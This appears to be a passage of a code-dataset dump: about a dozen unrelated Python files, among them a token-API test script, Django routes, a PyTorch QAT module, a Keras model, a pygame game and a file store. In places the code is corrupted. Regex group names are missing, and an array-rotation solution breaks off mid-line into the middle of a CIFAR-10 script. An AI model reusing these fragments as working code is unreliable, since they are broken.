json={'smartcontract_name': 'covid19greenlight', 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in', 'shareholder_name': 'Warren Buffet', 'shareholder_shortname': 'wbuffet'})\n print(str(r.status_code))\n print('--End of call to shareholder()--\\n\\n')\n #input('Press any key to Terminate:')\n #exit(0)\n \n \nis_asset_post_enabled = True\nif is_asset_post_enabled: \n url = '%s:%s/asset' % (host, port)\n # have to include the contents of\n # asset_payload_filepath = base_contract_json_path + '/covid19greenlight_asset_payload_SHC.json'\n \"\"\"\n {\"Ticker\": \"GRNLT\", \"Description\": \"COVID19Greenlight.org\"}\n \"\"\" \n # covid19greenlight_asset_definition_SHC.json\n \"\"\"\n {\"TransfersPermitted\": true, \"EnforcementOrdersPermitted\": true, \"TradeRestrictions\": [\"AUS\"], \"VotingRights\": true, \"VoteMultiplier\": 1, \"AdministrationProposal\": true, \"HolderProposal\": true, \"AssetModificationGovernance\": 1, \"TokenQty\": 256000, \"AssetType\": \"SHC\", \"AssetPayload\": \"0a0547524e4c541a15434f5649443139477265656e6c696768742e6f7267\"}\n \"\"\"\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', \n 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in', \n 'shareholder_name': 'Warren Buffet', \n 'shareholder_shortname': 'wbuffet', \n 'asset_payload': {\"Ticker\": \"GRNLT\", \"Description\": \"COVID19Greenlight.org\"},\n 'asset_definition': {\"TransfersPermitted\": True, \"EnforcementOrdersPermitted\": True, \"TradeRestrictions\": [\"AUS\"], \"VotingRights\": True, \"VoteMultiplier\": 1, \"AdministrationProposal\": True, \"HolderProposal\": True, \"AssetModificationGovernance\": 1, \"TokenQty\": 256000, \"AssetType\": \"SHC\"}},\n )\n # See response properties of r in https://www.w3schools.com/python/ref_requests_response.asp\n print(str(r.status_code))\n responsejson = r.json()\n AssetCode = responsejson['AssetCode']\n print('AssetCode=%s' % AssetCode)\n print('--End of call to asset()--\\n\\n')\n input('Press any key to Terminate:')\n exit(0) \n\nis_airdrop_enabled = True\nif is_airdrop_enabled:\n if not AssetCode:\n print('Missing AssetCode value. Please request /asset first.')\n input('Press any key to Terminate:')\n exit(1)\n url = '%s:%s/airdrop' % (host, port)\n r = requests.post(url, json={'smartcontract_name': 'covid19greenlight', 'CLIENT_CONTRACT_ADDRESS': '1QAinrbEfjv46jdpwZcqc1nB4tWH9AE8in', 'AssetCode': AssetCode, 'shareholder_name': 'Warren Buffet', 'shareholder_shortname': 'wbuffet', 'shareholder_moniker': 'wbuffet_13f4SpiGcvPa2ko6noeTj8fFKTJ8M2So6f'})\n print(str(r.status_code))\n print('--End of call to shareholder()--\\n\\n')\n input('Press any key to Terminate:')\n exit(0)\n\n\n","sub_path":"testapi.py","file_name":"testapi.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"298151980","text":"import spacy\n\n# Load English tokenizer, tagger, parser, NER and word vectors\nnlp = spacy.load('en')\n\n# Process a document, of any size\ntext = open('war_and_peace.txt').read()\ndoc = nlp(text)\n\n# Hook in your own deep learning models\nsimilarity_model = load_my_neural_network()\n\n\ndef install_similarity(doc):\n doc.user_hooks['similarity'] = similarity_model\n\n\nnlp.pipeline.append(install_similarity)\n\ndoc1 = nlp(u'the fries were gross')\ndoc2 = nlp(u'worst fries ever')\ndoc1.similarity(doc2)\n","sub_path":"All/Demo_Spacy.py","file_name":"Demo_Spacy.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356198535","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^users/register$', views.register, name='register'),\n url(r'^users/login$', views.login, name='login'),\n url(r'^users/home$', views.users_home, name='users_home'),\n url(r'^users/(?P\\w+)$', views.show_user, name='show_user'),\n url(r'^books$', views.books, name='books'),\n url(r'^books/add$', views.add_book, name='add_book'),\n url(r'^books/(?P\\w+)$', views.books_home, name=\"books_home\"),\n url(r'^books/review/(?P\\w+)$', views.review, name='review'),\n url(r'^logout', views.logout, name='logout')\n\n]\n","sub_path":"apps/bookreview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119986176","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom torch.nn import Conv2d as NNConv2d\nfrom torch.nn.modules.conv import conv2d_forward\nfrom torch.quantization.QConfig import default_qat_qconfig\n\nclass Conv2d(NNConv2d):\n r\"\"\"\n A Conv2d module attached with FakeQuantize modules for both output\n activation and weight, used for quantization aware training.\n\n We adopt the same interface as `torch.nn.Conv2d`, please see\n https://pytorch.org/docs/stable/nn.html?highlight=conv2d#torch.nn.Conv2d\n for documentation.\n\n Similar to `torch.nn.Conv2d`, with FakeQuantize modules initialized to\n default.\n\n Attributes:\n observer: fake quant module for output activation, it's called observer\n to align with post training flow\n weight_fake_quant: fake quant module for weight\n\n Examples::\n\n >>> # With square kernels and equal stride\n >>> m = nn.qat.Conv2d(16, 33, 3, stride=2)\n >>> # non-square kernels and unequal stride and with padding\n >>> m = nn.qat.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))\n >>> # non-square kernels and unequal stride and with padding and dilation\n >>> m = nn.qat.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2), dilation=(3, 1))\n >>> input = torch.randn(20, 16, 50, 100)\n >>> output = m(input)\n \"\"\"\n\n __FLOAT_MODULE__\n\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1,\n bias=True, padding_mode='zeros',\n activation_fake_quant=default_qat_qconfig.activation(),\n weight_fake_quant=default_qat_qconfig.weight()):\n super(Conv2d, self).__init__(in_channels, out_channels, kernel_size,\n stride=stride, padding=padding, dilation=dilation,\n groups=groups, bias=bias, padding_mode=padding_mode)\n self.observer = activation_fake_quant\n self.weight_fake_quant = weight_fake_quant\n\n def forward(self, input):\n return self.observer(conv2d_forward(input, self.padding_mode, self.padding,\n self.weight_fake_quant(self.weight), self.bias,\n self.stride, self.dilation, self.groups))\n\n @classmethod\n def from_float(cls, mod, qconfig=None):\n r\"\"\"Create a qat module from a float module or qparams_dict\n\n Args: `mod` a float module, either produced by torch.quantization utilities\n or directly from user\n \"\"\"\n assert type(mod) == cls.__FLOAT_MODULE__, ' nnq.' + cls.__name__ + '.from_float only works for ' + \\\n cls.__FLOAT_MODULE__.__name__\n if not qconfig:\n assert hasattr(mod, 'qconfig'), 'Input float module must have qconfig defined'\n assert mod.qconfig, 'Input float module must have a valid qconfig'\n qconfig = mod.qconfig\n qat_conv = cls(mod.in_channels, mod.out_channels, mod.kernel_size,\n stride=mod.stride, padding=mod.padding, dilation=mod.dilation,\n groups=mod.groups, bias=mod.bias is not None,\n padding_mode=mod.padding_mode,\n activation_fake_quant=qconfig.activation(),\n weight_fake_quant=qconfig.weight())\n qat_conv.weight = mod.weight\n qat_conv.bias = mod.bias\n return qat_conv\n","sub_path":"torch/nn/qat/modules/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37717122","text":"import numpy as np\r\nfrom misc import spectral as sp\r\n\r\nclass b_elem():\r\n def __init__(self, I=[-1.0, 1.0], n=1, bc=[], Id=None):\r\n self.I = np.array(I)\r\n self.n = n\r\n self.bc = bc\r\n if Id == None:\r\n self.Id = np.eye(n)\r\n else:\r\n self.Id = Id\r\n self.D = sp.chebDiff(self.n).dot(self.rp_eval())\r\n\r\n if I[0] == -np.inf:\r\n self.map = lambda x: -((1.0 - x) / (1.0 + x) - I[1])\r\n self.imap = lambda x: (x + 1.0 - I[1])/(-x + I[1] + 1.0)\r\n\r\n self.dmap = lambda x: (1.0 + x) ** 2.0 / 2\r\n self.idmap = lambda x: 2/(1 + x)**2\r\n return\r\n\r\n if I[1] == np.inf:\r\n self.map = lambda x: ((1.0 + x) / (1.0 - x) + I[0])\r\n self.imap = lambda x: (-x + I[0] + 1.0) / (-x + I[0] - 1.0)\r\n\r\n self.dmap = lambda x: (x - 1) ** 2.0 / 2.0\r\n self.idmap = lambda x: 2.0/(x - 1) ** 2.0\r\n return\r\n\r\n a = I[0]; b = I[1]\r\n q = (b - a) / 2.0; p = (b + a) / 2.0\r\n self.map = lambda x: (q * x + p)\r\n self.imap = lambda x: (x - p)/q\r\n\r\n self.dmap = lambda x: 1.0 / (q + x * 0)\r\n self.idmap = lambda x: q + 0\r\n\r\n def rp_eval(self):\r\n Id = self.Id\r\n for it in self.bc:\r\n Id[it[0], it[0]] = it[1]\r\n return Id\r\n\r\n def p_eval(self, x): ## return shape: (*x.shape, deg of element)\r\n x = np.atleast_1d(x)\r\n P = self.rp_eval()\r\n if x.size == 1:\r\n if x[0] == self.I[0]:\r\n return np.array([P[0, :]])\r\n if x[0] == self.I[-1]:\r\n return np.array([P[-1, :]])\r\n # print('oops')\r\n xs = self.imap(x)\r\n res = sp.bary(P, xs)\r\n return res\r\n\r\n def xs(self):\r\n x = sp.chebNodes(self.n)\r\n x = self.map(x)\r\n return x\r\n\r\n def new_xs(self):\r\n x = sp.chebNodes(self.n)\r\n mx = self.imap\r\n\r\n return x, mx\r\n\r\n def dp_eval(self, x): ## return shape: (*x.shape, deg of element)\r\n x = np.atleast_1d(x)\r\n P = self.D\r\n if x.size == 1:\r\n if x[0] == self.I[0]:\r\n return self.dmap(-1)*np.array([P[0, :]])\r\n if x[0] == self.I[-1]:\r\n return self.dmap(1)*np.array([P[-1, :]])\r\n xs = self.imap(x)\r\n res = sp.bary(f=P, x=xs)*np.reshape(self.dmap(xs), (*x.shape, 1))\r\n return res\r\n def gen_func(self):\r\n return lambda x: self.p_eval(x)\r\n def gen_funcd(self):\r\n return lambda x: self.dp_eval(x)\r\n\r\n def __call__(self, x):\r\n return self.p_eval(x)\r\n def d(self, x):\r\n return self.dp_eval(x)","sub_path":"FEM/elem/basis_elem.py","file_name":"basis_elem.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56577082","text":"#ej 1.4\ndef factorial(n):\n \"\"\"Devuelve el factorial de n\"\"\"\n factorial = 1\n for i in range(1, n + 1): \n factorial *= i\n\n return print(factorial)\n\ninputFactorial = int(input('Ingrese para factorial: '))\nfunction = factorial(inputFactorial)\n\nfor i in range(5):\n valor = int(input('Ingrese un valor: '))\n print(i +1, valor, factorial(valor))","sub_path":"practica/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"180934903","text":"import numpy\r\nimport pygame\r\nimport math\r\nimport os\r\nimport time\r\nimport random\r\n\r\nclass Game():\r\n def __init__(self, width, height, speed = 1, grid = 5):\r\n\r\n os.environ['SDL_AUDIODRIVER'] = 'dummy'\r\n pygame.init()\r\n\r\n self.clock = pygame.time.Clock()\r\n self.width = width\r\n self.height = height\r\n self.speed = speed\r\n self.grid = grid\r\n\r\n self.RED = (255,0,0)\r\n self.GREEN = (0,255,0)\r\n self.BLUE = (0,0,255)\r\n self.WHITE = (255,255,255)\r\n self.BLACK = (0,0,0)\r\n\r\n\r\n\r\n def resetGame(self):\r\n self.window = pygame.display.set_mode((self.width, self.height))\r\n pygame.display.set_caption(\"AI\")\r\n\r\n self.running = True\r\n self.score = 0\r\n self.gameOver = False\r\n self.playerX = self.width//2 - self.grid*10\r\n self.playerY = self.height - self.grid*10\r\n self.resetEnemy()\r\n self.resetFood()\r\n self.vel = 10\r\n\r\n def refresh(self):\r\n # self.clock.tick()\r\n pygame.time.delay(30)\r\n self.window.fill(self.WHITE)\r\n\r\n self.draw()\r\n pygame.display.update()\r\n\r\n\r\n def draw(self):\r\n # draw the player\r\n pygame.draw.rect(self.window, self.BLUE, (self.playerX, self.playerY, self.grid*20, self.grid*3))\r\n\r\n # draw enemy\r\n # pygame.draw.rect(self.window, self.RED, (self.enemyX, self.enemyY, self.grid*5, self.grid*5))\r\n \r\n # draw food\r\n pygame.draw.rect(self.window, self.GREEN, (self.foodX, self.foodY, self.grid*5, self.grid*5))\r\n \r\n font = pygame.font.SysFont('Comic Sans MS', 25)\r\n scoreText = font.render(\"Score: \" + str(self.score//100), True, self.BLACK)\r\n self.window.blit(scoreText, (25,25))\r\n pass\r\n\r\n\r\n def runGame(self):\r\n # pick up food\r\n if self.foodX in range(self.playerX - self.grid*5, self.playerX + self.grid*20) and \\\r\n self.foodY in range(self.playerY - self.grid*5, self.playerY + self.grid*3):\r\n self.resetFood()\r\n self.score += 100\r\n\r\n\r\n def handleAction(self, action):\r\n if (action == 'QUIT'):\r\n self.running = False\r\n\r\n if action == 'RESTART':\r\n self.resetGame()\r\n\r\n\r\n # handle player movement\r\n if action == 0:\r\n self.playerX -= self.vel\r\n if self.playerX < 0:\r\n self.playerX = 0\r\n\r\n if action == 1:\r\n self.playerX += self.vel\r\n if self.playerX > self.width - self.grid*20:\r\n self.playerX = self.width - self.grid*20\r\n\r\n # handle enemy movement (straight down)\r\n # self.enemyY += self.vel\r\n # if (self.enemyY > self.height):\r\n # self.resetEnemy()\r\n\r\n # handles food (straihght down)\r\n self.foodY += self.vel\r\n if (self.foodY > self.height):\r\n # DIE!\r\n # self.score -= 10\r\n self.running = False\r\n self.resetFood()\r\n\r\n def handleEvent(self, event):\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n\r\n def resetEnemy(self):\r\n self.enemyX = random.randint(0,self.width//self.grid - 5)*self.grid\r\n self.enemyY = self.grid*5\r\n\r\n\r\n\r\n def resetFood(self):\r\n self.foodX = random.randint(0,self.width//self.grid - 5)*self.grid\r\n # self.foodX = 400\r\n self.foodY = self.grid*5\r\n\r\n\r\n def getObservation(self):\r\n inline = False\r\n if self.foodX in range(self.playerX - 5*self.grid, self.playerX + self.grid*20):\r\n inline = True\r\n\r\n return [self.playerX - self.foodX]","sub_path":"ai/aiGame.py","file_name":"aiGame.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"324421417","text":"import sys\nsys.path.append(\"../\")\n\nfrom importlib import import_module\n\nclass DatasetFactory():\n\n dataset_path = {\n \"freesound_dataset\": \"shabda.data.dataset.freesound_dataset\",\n \"speech_commands_v0_02\" : \"shabda.data.dataset.speech_commands_v0_02\"\n }\n\n datasets = {\n \"freesound_dataset\": \"FreeSoundDataset\",\n \"speech_commands_v0_02\" : \"SpeechCommandsV002\"\n }\n\n def __init__(self):\n pass\n\n @staticmethod\n def _get_dataset(name):\n try:\n dataset = getattr(import_module(DatasetFactory.dataset_path[name]), DatasetFactory.datasets[name])\n except KeyError:\n raise NotImplemented(\"Given dataset file name not found: {}\".format(name))\n # Return the model class\n return dataset\n\n @staticmethod\n def get(dataset_name):\n dataset = DatasetFactory._get_dataset(dataset_name)\n return dataset\n\n\n","sub_path":"src/main/python/shabda/data/dataset/internal/dataset_factory.py","file_name":"dataset_factory.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"62628145","text":"#Reuseable basic support functions.\n\n\n#Decode string sent by a client into the filter input array.\ndef decode_filters_string(filters_string):\n #'ab&cd&ef&' -> ['ab', 'cd', 'ef']\n items = filters_string.split('&')\n return [x for x in items if len(x) > 0]\n\n\n#Filter player data according to filter input.\ndef filter_data(player_data, filter_input, tankopedia):\n filtered_player_data = []\n for tank in player_data:\n #Calling tankopedia tank dictionary.\n tp_dict = tankopedia.get(str(tank['tank_id']))\n if tp_dict:\n #Filtering.\n if tp_dict['type'] in filter_input and str(tp_dict['tier']) in filter_input:\n filtered_player_data.append(tank)\n return filtered_player_data\n\n\n#Substract old_data from new_data.\ndef find_difference(old_data, new_data):\n #Making a copy to prevent changing the input.\n old_data = old_data[:]\n #Deleting tanks from 'old_data' that were not played.\n for new_tank in new_data:\n for s, old_tank in enumerate(old_data):\n if new_tank['tank_id'] == old_tank['tank_id'] and new_tank['battles'] == old_tank['battles']:\n old_data.pop(s)\n break\n\n #Return if empty.\n if any(old_data) == False:\n return []\n\n #Deleting tanks from 'new_data' that aren't in filtered 'old_data'.\n old_tank_ids = [tank['tank_id'] for tank in old_data]\n temp_list = []\n for new_tank in new_data:\n if new_tank['tank_id'] in old_tank_ids:\n temp_list.append(new_tank)\n new_data = temp_list\n\n #Substracting difference.\n slice_data = []\n for old_tank in old_data:\n for new_tank in new_data:\n if old_tank['tank_id'] == new_tank['tank_id']:\n #Iterating through tank dictionary.\n temp_dict = {}\n for key, value in new_tank.items():\n temp_dict[key] = new_tank[key] - old_tank[key]\n #Preserving 'tank_id'\n temp_dict['tank_id'] = new_tank['tank_id']\n #Appending to output list.\n slice_data.append(temp_dict)\n break\n\n return slice_data\n","sub_path":"web/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111931498","text":"import json\nimport os\nfrom itertools import permutations\nfrom pathlib import Path\n\n\ndef search(JsonData, query, defaultQuery='i5 i7 Ryzen'):\n \"\"\"\n :param JsonData: json\n :param query: query\n :return: list\n \"\"\"\n\n query = query.split(' ')\n flatten, result, finalUnique = {}, {}, []\n final = []\n\n k = [comb for x in range(1, len(query) + 1) for comb in list(permutations(query, x))]\n\n # helper\n uniq = list(set(tuple(frozenset(x)) for x in set(k)))\n\n [finalUnique.append(\" \".join(elem).strip()) for elem in uniq]\n\n if all([len(x) >= 0 for x in finalUnique]):\n for elem in finalUnique:\n arr = []\n for data in JsonData:\n if elem.lower() in str(data['name']).lower():\n arr.append(data['name'])\n\n if len(arr) > 0:\n result.update({len(arr): arr})\n\n sort = sorted(result.items())\n\n for count, data in sort:\n for x in data:\n flatten.update({x: None})\n\n for x in flatten.keys():\n for y in JsonData:\n if x == y['name']:\n final.append(y)\n\n return final\n else:\n return search(JsonData=JsonData, query='')\n\n\nif __name__ == \"__main__\":\n\n currentPath = Path(__file__).parent.parent.parent\n storage = os.path.join(currentPath, \"storage\")\n\n with open(file=os.path.join(storage, 'powersupply.json')) as file:\n jsonData = json.loads(file.read())\n\n newData = []\n\n res =search(JsonData=jsonData, query='Antec')\n\n for x in res:\n for y in x.items():\n print(y)","sub_path":"backend/api/Controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"426908662","text":"import helper\nimport tensorflow as tf\nimport pandas as pd\nfrom keras.models import Sequential, Model,load_model\nfrom keras.layers import Convolution2D,Cropping2D,Dropout,MaxPooling2D,Lambda\nfrom keras.layers.core import Dense,Activation,Flatten\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks import TensorBoard\nimport matplotlib.pyplot as plt\n\n\n\n\ndef save_model(model,name=\"model.h5\"):\n print(\"Saving Model ...\")\n model.save(name)\n\n\ndef create_model():\n model = Sequential()\n\n model.add(Convolution2D(16, 3, 3, input_shape=(32, 128, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Convolution2D(32, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Convolution2D(64, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Flatten())\n model.add(Dense(500, activation='relu'))\n model.add(Dropout(.5))\n model.add(Dense(100, activation='relu'))\n model.add(Dropout(.25))\n model.add(Dense(20, activation='relu'))\n model.add(Dense(1))\n adam = Adam(lr=0.0001) # Use adam optimizer with a learning rate of 0.001\n model.compile(optimizer=adam, loss='mean_squared_error')\n\n return model\n\ndef train():\n print(\"Loading data ...\")\n df = helper.read_data()\n # Follow Paleto's principle for splitting training and validation data\n print(\"Splitting data ...\")\n df_train, df_valid = train_test_split(df, test_size=0.2)\n\n print(\"Creating model ...\")\n model = create_model()\n # Train the model\n #samples_per_epoch = (20000//128)*128\n print(\"Training model ...\")\n tbCallback = TensorBoard(log_dir='./logs', histogram_freq=0, write_graph=True, write_images=True)\n history_object = model.fit_generator(\n helper.data_generator(df_train,training=True),\n samples_per_epoch=len(df_train),\n nb_epoch=5,\n validation_data=helper.data_generator(df_valid,training=False),\n nb_val_samples=len(df_valid), callbacks=[tbCallback])\n\n save_model(model)\n print(\"Done ... :)\")\n print(\"visualizing ...\")\n print(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\n plt.plot(history_object.history['loss'])\n plt.plot(history_object.history['val_loss'])\n plt.title('model mean squared error loss')\n plt.ylabel('mean squared error loss')\n plt.xlabel('epoch')\n plt.legend(['training set', 'validation set'], loc='upper right')\n plt.show()\n\n\nif __name__ == \"__main__\" :\n train()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261042450","text":"# solution 1\nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n extra = [None]*len(nums)\n for i in range(len(nums)):\n extra[(i+k) % len(nums)] = nums[i]\n\n for i in range(len(nums)):\n nums[i] = extra[i]\n\n#solution 2 \nclass Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n def reverse(arr,start,end):\n while start= NUM_TO_AUGMENT:\n break\n xtas.append(x_aug[0])\n num_aug+=1\n\ndatagen.fit(X_train)\n\n# OHE\nY_train = np_utils.to_categorical(y_train, NB_CLASSES)\nY_test = np_utils.to_categorical(y_test, NB_CLASSES)\n\n# float and normalize\n# I should really make some boilerplate code for this, DRY and all that\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n# network\nmodel = Sequential()\n# first step: learn 32 3x3 convolutional filters, dropout 25% of values\nmodel.add(Conv2D(32, (3, 3), padding='same', input_shape=(IMG_ROWS, IMG_COLS, IMG_CHANNELS)))\nmodel.add(Activation('relu'))\n# conv -> conv -> maxpool -> dropout\nmodel.add(Conv2D(32, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n# conv (64 filters) -> conv -> maxpool -> dropout\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n# next: dense network with 512 (32 x 32) neurons, then softmax to classify\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(NB_CLASSES))\nmodel.add(Activation('softmax'))\nmodel.summary()\n\n# train and test\nmodel.compile(loss='categorical_crossentropy', optimizer=OPTIMIZER, metrics=['accuracy'])\nmodel.fit(X_train, Y_train, batch_size=BATCH_SIZE, epochs=NB_EPOCH, validation_split=VALIDATION_SPLIT, verbose=VERBOSE)\nscore = model.evaluate(X_test, Y_test, batch_size=BATCH_SIZE, verbose=VERBOSE)\nprint(\"Test score: \", score[0])\nprint(\"Test accuracy: \", score[1])\n\n# save to JSON\nmodel_json = model.to_json()\ndir = 'cifar10_3_model'\nwith open(os.path.join(dir, 'cifar10_architecture.json'), 'w') as f:\n f.write(model_json)\nmodel.save_weights(os.path.join(dir, 'cifar10_weights.h5'), overwrite=True)\n\n# cleanup\nshutil.rmtree(tmpdir)\n","sub_path":"Ch_3/CIFAR-10_3.py","file_name":"CIFAR-10_3.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"622249535","text":"# -*- coding: utf-8 -*-\nimport logging\nimport datetime as dt\nimport re\nimport os\nimport ujson as json\nimport uuid\n\nfrom scandir import scandir\n\nfrom iwlearn.storage.base import BaseStore\n\nclass FileStore(BaseStore):\n def __init__(self, sampletype, basepath = 'input/filestore'):\n BaseStore.__init__(self, sampletype)\n self.samplebase = os.path.join(basepath, os.path.join('samples',sampletype.__name__))\n self.predictionbase = os.path.join(basepath, os.path.join('predictions',sampletype.__name__))\n\n def _scan(self, strategy):\n for entry in scandir(self.samplebase):\n if entry.is_dir():\n try:\n day = dt.datetime.strptime(entry.name, '%Y-%m-%d')\n if not strategy.is_part(day):\n continue\n for entry2 in scandir(entry.path):\n if entry2.is_file():\n try:\n eid = entry2.name[0:-7]\n if not strategy.is_entity(eid):\n continue\n timeofday = dt.datetime.strptime(entry2.name[-6:], '%H%M%S')\n day = day.replace(hour=timeofday.hour, minute=timeofday.minute,\n second=timeofday.second)\n if strategy.is_fetch(day, eid):\n id = os.path.join(entry.name, entry2.name)\n strategy.add_fetch(id)\n except:\n logging.error('error fetching')\n except:\n logging.error('error part selection')\n\n def find_latest_sample(self, entityid):\n class LatestSearch:\n def __init__(self, entityid):\n self.entityid = entityid\n self.latest = None\n self.result = None\n\n def is_part(self, day):\n return True\n\n def is_entity(self, eid):\n return eid == self.entityid\n\n def is_fetch(self, datetime, eid):\n if self.latest is None or self.latest < datetime:\n self.latest = datetime\n return True\n return False\n\n def add_fetch(self, id):\n self.result = id\n\n strategy = LatestSearch(entityid)\n self._scan(strategy)\n if strategy.result is None:\n return None\n return self._load(strategy.result)\n\n def _load(self, id):\n with open(os.path.join(self.samplebase, id), 'r') as f:\n doc = json.load(f)\n doc = BaseStore._convert_data_from_json(doc)\n sample = self.sampletype.fromjson(doc)\n sample['_id'] = id\n return sample\n\n def find_samples(self, *args, **kwargs):\n \"\"\"\n Supports the following filter conditions:\n earliest : Date or DateTime\n latest = Date or DateTime\n match_entityid = Lambda getting entityid and returning boolean\n \"\"\"\n return list(self.find_samples_generator(*args, **kwargs))\n\n def find_samples_generator(self, batch_size=1000, *args, **kwargs):\n \"\"\"\n Supports the following filter conditions:\n earliest : Date or DateTime\n latest = Date or DateTime\n match_entityid = Lambda getting entityid and returning boolean\n \"\"\"\n\n class FilterStrategy():\n def __init__(self, kwargs):\n self.filter = kwargs\n self.result = []\n if 'earliest' in self.filter:\n if type(self.filter['earliest']) == dt.date:\n self.filter['earliest'] = dt.datetime(\n year=self.filter['earliest'].year,\n month=self.filter['earliest'].month,\n day=self.filter['earliest'].day,\n )\n if type(self.filter['earliest']) == dt.datetime:\n self.filter['earliest'] = self.filter['earliest'].replace(microsecond=0)\n\n if 'latest' in self.filter:\n if type(self.filter['latest']) == dt.date:\n self.filter['latest'] = dt.datetime(\n year=self.filter['latest'].year,\n month=self.filter['latest'].month,\n day=self.filter['latest'].day,\n hour=23, minute=59, second=59\n )\n if type(self.filter['latest']) == dt.datetime:\n self.filter['latest'] = self.filter['latest'].replace(microsecond=0)\n\n def is_part(self, day):\n if 'earliest' in self.filter:\n if day.date() < self.filter['earliest'].date():\n return False\n\n if 'latest' in self.filter:\n if day.date() > self.filter['latest'].date():\n return False\n\n return True\n\n def is_entity(self, eid):\n return 'match_entityid' not in self.filter or self.filter['match_entityid'](eid)\n\n def is_fetch(self, datetime, eid):\n if 'earliest' in self.filter:\n if datetime < self.filter['earliest']:\n return False\n\n if 'latest' in self.filter:\n if datetime > self.filter['latest']:\n return False\n\n return True\n\n def add_fetch(self, id):\n self.result.append(id)\n\n strategy = FilterStrategy(kwargs)\n self._scan(strategy)\n for id in strategy.result:\n yield self._load(id)\n\n\n def _get_paths(self, sample):\n part = sample.created.strftime('%Y-%m-%d')\n file = re.sub('[^a-zA-Z0-9_.\\\\-]', '_', sample.entityid) + \\\n '_' + sample.created.strftime('%H%M%S')\n dir = os.path.join(self.samplebase, part)\n fullpath = os.path.join(dir, file)\n id = os.path.join(part, file)\n return dir, fullpath, id\n\n def insert_sample(self, sample):\n dir, fullpath, id = self._get_paths(sample)\n\n data = BaseStore._convert_data_for_json(sample.data)\n self._insert_data(dir, fullpath, data)\n sample['_id'] = id\n\n def replace_sample(self, sample):\n if '_id' in sample:\n fullpath = os.path.join(self.samplebase, sample['_id'])\n else:\n _, fullpath, _ = self._get_paths(sample)\n if os.path.isfile(fullpath):\n tmp = uuid.uuid4().hex\n os.rename(fullpath, fullpath + '__' + tmp)\n self.insert_sample(sample)\n os.remove(fullpath + '__' + tmp)\n\n def insert_samples(self, samples):\n for sample in samples:\n self.insert_sample(sample)\n\n def _insert_prediction(self, data):\n part = data['created'].strftime('%Y-%m-%d')\n file = re.sub('[^a-zA-Z0-9_.\\\\-]', '_', data['entityid']) + \\\n '_' + data['created'].strftime('%H%M%S')\n dir = os.path.join(self.predictionbase, part)\n fullpath = os.path.join(dir, file)\n self._insert_data(dir, fullpath, data)\n\n def _insert_data(self, dir, fullpath, data):\n os.makedirs(dir, exist_ok=True)\n if os.path.isfile(fullpath):\n raise Exception('Cannot insert data under %s: its already exists' % fullpath)\n with open(fullpath, 'w') as f:\n json.dump(data, f)\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO, 